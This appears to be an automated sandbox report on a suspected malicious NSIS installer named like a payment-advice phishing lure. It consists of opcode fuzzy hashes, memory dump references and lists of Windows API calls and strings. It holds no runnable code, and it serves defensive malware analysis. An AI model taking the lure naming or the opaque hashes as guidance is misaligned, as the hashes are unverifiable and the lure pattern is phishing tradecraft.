                                                                                                                                          • Instruction ID: a213c9ca6f35e75c49beff47c7077e97cbc2e6baa6ac1426c90b11d5229adac6
                                                                                                                                          • Opcode Fuzzy Hash: 14354849d0ef71ca569aa3efc212ba10b73d2ceb3f1c3770138f0ece93f567f8
                                                                                                                                          • Instruction Fuzzy Hash: 1B311274E012588BEB08DFEAD8406DDBBF2BF89300F10D46AD419BB254EB355906CF54
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353627350.000000003A810000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A810000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a810000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 23bd5a2ea4b6fb431109623badccb1e6571c9ff71063791c1175782d7a45774a
                                                                                                                                          • Instruction ID: 8ff599cbb715900c117cab57e219212c1fc4e06f865ab9b5e44c65fed2359452
                                                                                                                                          • Opcode Fuzzy Hash: 23bd5a2ea4b6fb431109623badccb1e6571c9ff71063791c1175782d7a45774a
                                                                                                                                          • Instruction Fuzzy Hash: F931A0B4E01208CFDB08DFAAD5906DDBBF2AF89300F64D12AC419BB254DB355946CF55
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4e3cf21548b77f2687538dee39e23d275bdade08873038f84f3799e825a5c6da
                                                                                                                                          • Instruction ID: f1cf006fbaf9ef18e8b3d8f2fd0255a5592945efaedd6f67713d5fedb7c7e01f
                                                                                                                                          • Opcode Fuzzy Hash: 4e3cf21548b77f2687538dee39e23d275bdade08873038f84f3799e825a5c6da
                                                                                                                                          • Instruction Fuzzy Hash: DE21BE303042028BDB286B29CC9473E3696EFD4748F248139D506CB7A9EF75CC92D392
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353627350.000000003A810000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A810000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a810000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 374d84ced3f1dce0073458fcd57942addc1b696a07d4fc6d411cc364120cb0e1
                                                                                                                                          • Instruction ID: 9b660e35ed6459422f67323ffa418d68f8409c668d26e21b39f956b98ddcc30c
                                                                                                                                          • Opcode Fuzzy Hash: 374d84ced3f1dce0073458fcd57942addc1b696a07d4fc6d411cc364120cb0e1
                                                                                                                                          • Instruction Fuzzy Hash: 3F31E3B4E052088FDB04DFE9D5906DDBBF2AF99300F64912AC418BB254DB319A46CF54
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 49945803b4f4c0a75378df869b21acb273e2c51ecd055c880b460c2dbac4d2e7
                                                                                                                                          • Instruction ID: 8ba89ef21141741f9ea898c2458de0ee7c2940ea7c71011df262bc7a4fd20873
                                                                                                                                          • Opcode Fuzzy Hash: 49945803b4f4c0a75378df869b21acb273e2c51ecd055c880b460c2dbac4d2e7
                                                                                                                                          • Instruction Fuzzy Hash: 81219CB1E04225AFCB54DFB8D85459E7BF1AF89311B1141AAD88AE7360EB3589028F90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8a41cf2c4da1376d746fd0cfadf4a5e96e47d5c18d56724d7167ad54397eaa8e
                                                                                                                                          • Instruction ID: b322ba035d3ab723dc043041bb10dbf9f84f144eaf01dcbc683a23df2f0d8a2a
                                                                                                                                          • Opcode Fuzzy Hash: 8a41cf2c4da1376d746fd0cfadf4a5e96e47d5c18d56724d7167ad54397eaa8e
                                                                                                                                          • Instruction Fuzzy Hash: 17216035A005259FCB24DF64C8409AE77A5EBED368F24C059D8199B280DB35EE47CBD2
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3322936281.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_9d000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8c9484b129b32b4c108829c4ec359077f844cf1a356a149396793726cfbfc5d8
                                                                                                                                          • Instruction ID: 0abd2435472032c1870b240d54bb2b59d0b440ab4a11ac0bc3003d896f528dca
                                                                                                                                          • Opcode Fuzzy Hash: 8c9484b129b32b4c108829c4ec359077f844cf1a356a149396793726cfbfc5d8
                                                                                                                                          • Instruction Fuzzy Hash: 6721F5B1544240EFDF15DF14D9C0B2ABFA5FB98318F24C56AE9090B246C336D856EBA2
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2e9ecca380c1f29ce0aec02fb7d811cde2939cbd7ab8eb4264fcf059cdfedeeb
                                                                                                                                          • Instruction ID: 0d0662e9ce2e359bf78339bf4cb645c96fd9d2d3b980b8df063fd7b3b36f9b83
                                                                                                                                          • Opcode Fuzzy Hash: 2e9ecca380c1f29ce0aec02fb7d811cde2939cbd7ab8eb4264fcf059cdfedeeb
                                                                                                                                          • Instruction Fuzzy Hash: D321E1357006118FC7299B2ADCA493EB7A2FFCA7557154578E80ADB7A8CF30DC028B90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3322978565.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_ad000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e5bd64325239580bc76d675daf148ba1d5532002b1499d4e994ac98f34d72223
                                                                                                                                          • Instruction ID: f2d26b6a8f9df0ee880e628e4fdfef13366fa053b00613426a973822727ee049
                                                                                                                                          • Opcode Fuzzy Hash: e5bd64325239580bc76d675daf148ba1d5532002b1499d4e994ac98f34d72223
                                                                                                                                          • Instruction Fuzzy Hash: 3B2107B1504204EFDB14CF64D9C4F26BBA5FB85314F34CA6EE94A4B641C73AD846CA61
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: eb35a86f41969a1d58c82a79453d51cd3661b9711a73179857d385d8afd135ef
                                                                                                                                          • Instruction ID: 99e1bb8ca8edf6871d6b57ff3b9193c63e163f511919486055e343ac95350406
                                                                                                                                          • Opcode Fuzzy Hash: eb35a86f41969a1d58c82a79453d51cd3661b9711a73179857d385d8afd135ef
                                                                                                                                          • Instruction Fuzzy Hash: 70319474E11218DFCB54DFB8D59489DBBB2FF49314B2080A9E819AB364D731AD42CF41
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ef1cfd9b10769c590d18f5a8eadb9db8096fd1fecf5e0651be16e12a6be9fa79
                                                                                                                                          • Instruction ID: 847972d87730c8079b5ac2baee60b61a501cda02d440e68f65ba00511b98c461
                                                                                                                                          • Opcode Fuzzy Hash: ef1cfd9b10769c590d18f5a8eadb9db8096fd1fecf5e0651be16e12a6be9fa79
                                                                                                                                          • Instruction Fuzzy Hash: 4621A272B002049BCB148F64DC84AEEBBB6FF8C711F144169F915A7250DB31AD51CB91
                                                                                                                                          • Instruction ID: 5af7107926ac16e16dae9a1034a0686d3396250bf01473d292030ef2f2689815
                                                                                                                                          • Opcode Fuzzy Hash: 90151d60e08759e555c59117b33dc280601d02d2bf8d85576d1eb197a303507c
                                                                                                                                          • Instruction Fuzzy Hash: 6A111B74D0424A9FDB01CFA8C8545AEFBB1FF8A305F0041A5D914A3351E7755A16CB91
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2f5a0d28e4fe77b7bacf5a3af78154938b374431c386ff5bccabf74a168ba84f
                                                                                                                                          • Instruction ID: a39ac448ca6ee77967925deb0a26e5d1efca528c1f64f8b6078d225b2fc38526
                                                                                                                                          • Opcode Fuzzy Hash: 2f5a0d28e4fe77b7bacf5a3af78154938b374431c386ff5bccabf74a168ba84f
                                                                                                                                          • Instruction Fuzzy Hash: 7EF0BB313006104BC7155A2EDC54A2EB7DEEFC9B553994079E909DB371EF21CC538B91
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 84d3e859bcce24ba19c05f9be4342cff96aa2e08377440ed7d4af61fab80a375
                                                                                                                                          • Instruction ID: d3adb129bdc8060353760d715f723dfc4c02c57d7b401076566a183f6b985361
                                                                                                                                          • Opcode Fuzzy Hash: 84d3e859bcce24ba19c05f9be4342cff96aa2e08377440ed7d4af61fab80a375
                                                                                                                                          • Instruction Fuzzy Hash: C7F0F632B086108FD7068B28A4249AEBBB6EFC566470650ABE009C7360EB32CC02C790
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b6a35d528c990afb0e1fcd8be6d8b64f742f601809017efdbe2e13aa92db4967
                                                                                                                                          • Instruction ID: 270517b9ff1cb059bbccde4992a3f6a7fc27200285512e5b9b92e85550879a81
                                                                                                                                          • Opcode Fuzzy Hash: b6a35d528c990afb0e1fcd8be6d8b64f742f601809017efdbe2e13aa92db4967
                                                                                                                                          • Instruction Fuzzy Hash: D101E470E04229AFCB54EFB988106AEBBF5AF48200F00816AD559F7250EB3859028F91
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4a2cd14a18bbdb2812d5c03302ec6148e3dbccab2021322bd00490d64418fb63
                                                                                                                                          • Instruction ID: 5d196cd88f5b0481d5ad70850ca6cfeb145bae4d86aeb53ee380a5e10d863c80
                                                                                                                                          • Opcode Fuzzy Hash: 4a2cd14a18bbdb2812d5c03302ec6148e3dbccab2021322bd00490d64418fb63
                                                                                                                                          • Instruction Fuzzy Hash: A4F05E343082149FD748DF29DC64A267BE9BF8675071544E9F505CB3B1DAA0DC01CB90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a9bdefd7fa02ae2fb428a1431a9fe5f610845b115cfc211da7f6062d86031a3c
                                                                                                                                          • Instruction ID: fa5cf30bc6088580be44b82aee50176b532f8490425fd0d143d2a91752254179
                                                                                                                                          • Opcode Fuzzy Hash: a9bdefd7fa02ae2fb428a1431a9fe5f610845b115cfc211da7f6062d86031a3c
                                                                                                                                          • Instruction Fuzzy Hash: 54F08C343042149FEB48DF2AEC68A2A37AAEFC5B5070584A9F506CB7A0DE60DC01CB90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 69a19e883b4e953885399cfd699fb8491ce9345f6a24e3bc27cd95fda2f401d7
                                                                                                                                          • Instruction ID: 0890351fd896717009039e6b8f4af57fea01348f1241ddda509484493d74e6eb
                                                                                                                                          • Opcode Fuzzy Hash: 69a19e883b4e953885399cfd699fb8491ce9345f6a24e3bc27cd95fda2f401d7
                                                                                                                                          • Instruction Fuzzy Hash: 6BF05E36301205DFC700CF6AC488C5ABBEAFF88724751806AF6098B334DB71AC51CB80
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 221ae8e6c5a2c17e647c86e055d572e298f39d1f561adb6a144764050493746f
                                                                                                                                          • Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
                                                                                                                                          • Opcode Fuzzy Hash: 221ae8e6c5a2c17e647c86e055d572e298f39d1f561adb6a144764050493746f
                                                                                                                                          • Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c57873bd80f0b18a7ddfb7471e0f7f9113cd591141a2750083f1c09ea418e3c1
                                                                                                                                          • Instruction ID: d05f8abbdcce3893244e24777515d881a7b217e4be30d250c58940b9ce7547cb
                                                                                                                                          • Opcode Fuzzy Hash: c57873bd80f0b18a7ddfb7471e0f7f9113cd591141a2750083f1c09ea418e3c1
                                                                                                                                          • Instruction Fuzzy Hash: 6CD05B35D6062BD6CB11EBA1EC100DDB334EED5265B548617D53837150EB34275EC7E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 294c05485a0350ba7db6ea3c1be5514d24cb3a27a53c42cea2c0e6a2292c8513
                                                                                                                                          • Instruction ID: edefc5568a91d42adb7dc92c7b98baa9d1b9fa4b487429db2bf08cd468929b09
                                                                                                                                          • Opcode Fuzzy Hash: 294c05485a0350ba7db6ea3c1be5514d24cb3a27a53c42cea2c0e6a2292c8513
                                                                                                                                          • Instruction Fuzzy Hash: 93D0C7367151687B4B551A49D4048AE7B6FD7CD7717048026F90A93300CE714D1297D5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0a22e0f0729ad62e643258ed7556d26a2a75733223fefd124ae55c6a0c73d5d7
                                                                                                                                          • Instruction ID: 33eb9f6433674bc3404b393f6531f2a6a9171763e55c1988a8511fb422862908
                                                                                                                                          • Opcode Fuzzy Hash: 0a22e0f0729ad62e643258ed7556d26a2a75733223fefd124ae55c6a0c73d5d7
                                                                                                                                          • Instruction Fuzzy Hash: 68D04275E04109CBCB20DFA8E9844DCBB71EF89321B60546BD925A3651D73059558F11
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d02904eef80a466c5904f3048c7681c202f7671161dc3d895ea3837bd110af5f
                                                                                                                                          • Instruction ID: 6d9054b25e5052d652ad212ab3ca2637521909f60148349945c6f368ca3c1a19
                                                                                                                                          • Opcode Fuzzy Hash: d02904eef80a466c5904f3048c7681c202f7671161dc3d895ea3837bd110af5f
                                                                                                                                          • Instruction Fuzzy Hash: 65D0673AB40018AFCB049F9CEC908DDF776FB98221B048526F915A3261C6319965DB90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f900f3c0ab8922ae00e733cd5a3a87b44de2f29456af218a80eab6a06c276dd5
• Instruction ID: 7fa0abc01565149169b2ca77a075002c7fce322b25d5f46502cf4b3e5d559052
• Opcode Fuzzy Hash: f900f3c0ab8922ae00e733cd5a3a87b44de2f29456af218a80eab6a06c276dd5
• Instruction Fuzzy Hash: 98C0123000430D4AC745E7A5EC55555B72BA7802147708950B4060696AEEB81D964B90
APIs
• GetDlgItem.USER32(?,000003F9), ref: 00404B28
• GetDlgItem.USER32(?,00000408), ref: 00404B33
• GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7D
• LoadBitmapW.USER32(0000006E), ref: 00404B90
• SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBD
• ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCF
• SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BF1
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C03
• DeleteObject.GDI32(00000000), ref: 00404C06
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C31
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3D
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD3
• SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFE
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D12
• GetWindowLongW.USER32(?,000000F0), ref: 00404D41
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4F
• ShowWindow.USER32(?,00000005), ref: 00404D60
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5D
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC2
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED7
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EFB
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F1B
• ImageList_Destroy.COMCTL32(?), ref: 00404F30
• GlobalFree.KERNEL32(?), ref: 00404F40
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB9
• SendMessageW.USER32(?,00001102,?,?), ref: 00405062
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405071
• InvalidateRect.USER32(?,00000000,00000001), ref: 00405091
• ShowWindow.USER32(?,00000000), ref: 004050DF
• GetDlgItem.USER32(?,000003FE), ref: 004050EA
• ShowWindow.USER32(00000000), ref: 004050F1
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $M$N
• API String ID: 1638840714-813528018
• Opcode ID: f5222cf6d3fcdeff0966a9eee7e30bd6d921d2d03bb49bae54bf4b748700a109
• Instruction ID: d71a5cbf05b966a5fca8a5aa47d1df2e6c399d67ef135bcf6f64f468dd7cdb7f
• Opcode Fuzzy Hash: f5222cf6d3fcdeff0966a9eee7e30bd6d921d2d03bb49bae54bf4b748700a109
• Instruction Fuzzy Hash: 6E027FB0900209EFEB209F54DD85AAE7BB5FB84314F10857AF610BA2E0D7799D52CF58
APIs
• #17.COMCTL32 ref: 00403379
• SetErrorMode.KERNEL32(00008001), ref: 00403384
• OleInitialize.OLE32(00000000), ref: 0040338B
  • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
  • Part of subcall function 00406254: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406271
  • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
• SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B3
  • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
• GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
• GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
• CharNextW.USER32(00000000,00434000,00000020), ref: 00403402
• GetTempPathW.KERNEL32(00000400,00436800,00000000,00000020), ref: 0040350B
• GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040351C
• lstrcatW.KERNEL32(00436800,\Temp), ref: 00403528
• GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040353C
• lstrcatW.KERNEL32(00436800,Low), ref: 00403544
• SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403555
• SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040355D
• DeleteFileW.KERNEL32(00436000), ref: 00403571
• OleUninitialize.OLE32(?), ref: 00403621
• ExitProcess.KERNEL32 ref: 00403641
• lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 0040364D
• lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 00403659
• CreateDirectoryW.KERNEL32(00436800,00000000), ref: 00403665
• SetCurrentDirectoryW.KERNEL32(00436800), ref: 0040366C
• DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C6
• CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 004036DA
• CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403707
• GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375D
• ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
• ExitProcess.KERNEL32 ref: 004037BC
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
• String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
• API String ID: 4107622049-1875889550
• Opcode ID: f59da56ce79cf3752257f316979aefb191ab981252506581a540253af1472897
• Instruction ID: adac61535fb2ab45c93a94ea6b46826cba801cc8f349b6914fd9ce0ca4797ca8
• Opcode Fuzzy Hash: f59da56ce79cf3752257f316979aefb191ab981252506581a540253af1472897
• Instruction Fuzzy Hash: 72B1C170904211AAD720BF619D49A3B3EACEB4570AF40453FF542BA2E2D77C9941CB7E
APIs
• DeleteFileW.KERNEL32(?,?,00436800,75922EE0,00434000), ref: 0040579B
